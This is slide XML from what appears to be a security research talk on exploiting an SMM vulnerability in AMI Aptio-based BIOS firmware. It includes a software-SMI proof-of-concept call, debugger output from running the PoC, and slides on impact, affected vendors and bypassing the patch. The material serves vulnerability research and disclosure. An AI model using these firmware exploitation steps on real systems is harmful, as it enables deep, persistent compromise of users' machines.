                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>intr.send_SW_SMI(0, SMI_USB_RUNTIME, 0, 0, 0, 0, 0, 0, 0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Shape 624"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Writing PoC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Shape 625"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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630" name="Shape 630"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Shape 631"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638100" y="1567175"/>
            <a:ext cx="11124300" cy="495600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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.cv.smmentrybreak=1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.go()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># running PoC on the target system...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.cv.machinecheckbreak=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; itp.go()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>	[SKL_C0_T0] Machine Check break at 0x38:0000000000BADDAD in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C0_T1] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T0] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>[SKL_C1_T1] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Shape 632"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t> PoC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Shape 633"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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638" name="Shape 638"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Shape 639"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605160" y="3079080"/>
            <a:ext cx="11501700" cy="718200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="90000" rIns="90000" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-2299" lvl="0" marL="395999" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Impact and bypassing the patch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Shape 640"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="2912760"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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645" name="Shape 645"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651050" y="1559869"/>
            <a:ext cx="5207400" cy="462150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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The vulnerable module is used by all the vendors whose BIOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>is based on AMI Aptio:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>GIGABYTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>ASUS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>MSI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Dell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
